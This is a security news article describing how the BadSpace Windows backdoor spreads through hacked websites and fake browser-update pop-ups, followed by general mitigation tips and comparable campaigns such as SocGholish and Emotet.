Some legitimate but hacked websites they are used as a conduit to distribute a Windows backdoor called BadSpace, under the false guise of browser updates.
BadSpace malware according to cybersecurity experts
“The threat actor uses a multi-stage attack chain involving an infected website, a command and control (C2) server, in some cases a fake browser update, and a JScript downloader to deploy a backdoor into the victim’s system“, has declared in a report by the German cybersecurity company G DATA.
Details of the malware were first shared last month by researchers kevross33 And Gi7w0rm.
It all starts with a compromised website, including those built on WordPress, which injects malicious code to determine whether a user has visited the site previously.
If it is the user’s first visit, the code collects information about the deviceIP address, user-agent and location, and transmits them to an encrypted domain via an HTTP GET request.
The Appearance: Fake Browser Updates
The server response subsequently overlays the web page contents with a fake Google Chrome update pop-up window to directly download the malware or a JavaScript downloader which, in turn, downloads and executes BadSpace.
An analysis of the C2 servers used in the campaign revealed of connections with an already known malware called SocGholish (also called FakeUpdates), a JavaScript-based malware downloader that is propagated via the same mechanism.
BadSpace, in addition to employing anti-sandbox controls and setting persistence using scheduled tasks, is able to collect system information and process commands that allow it to capture screenshots, execute instructions using cmd.exe, read and write files, and cancel the scheduled task.
The disclosure comes as both eSentire and Sucuri have warned of several campaigns exploiting fake browser updates on compromised sites to distribute stolen information and remote access Trojans.
What to do if you encounter BadSpace or similar threats
Below is a small series of tips on how to mitigate BadSpace or similar threats:
- Don’t click on suspicious pop-ups: If you see an unsolicited browser update window, avoid clicking it; this thing should be known by many by now, but apparently It is not so.
- Official updates: Always carry out browser and operating system updates directly from the official settings or from the manufacturer’s official sites.
- Use antivirus software: Make sure your antivirus software is updated and active to detect and block any threats.
- Check the system: If you suspect an infection, run a full system scan using reputable security software.
- Malware Removal: In case of confirmed infection, follow the instructions of your antivirus software to remove the malware. You may need to use specialized tools for removing persistent malware.
- Update credentials: Change passwords for all accounts accessible from the infected device to prevent further compromises.
- Consult an expert: If you are unable to resolve the infection on your own, consult a cybersecurity expert for professional assistance.
Some similar cases
In recent years, there have been several similar cases of malware distributed via fake browser updates and compromised websites; as mentioned previously an example is the SocGholish malware, which uses almost identical techniques to BadSpace to infect user devices.
Another famous case is that of the Adrozek malware, which spread via fake browser updates to compromise Windows systems and insert unwanted advertisements into search results.
Furthermore, the Emotet malware, known to be one of the most widespread Trojans, has often used compromised websites to spread and infect corporate networks with sophisticated phishing techniques.
These examples highlight the importance of remaining vigilant and taking appropriate security measures to protect your systems from similar threats.
#BadSpace #Windows #malware #legitimate #sites
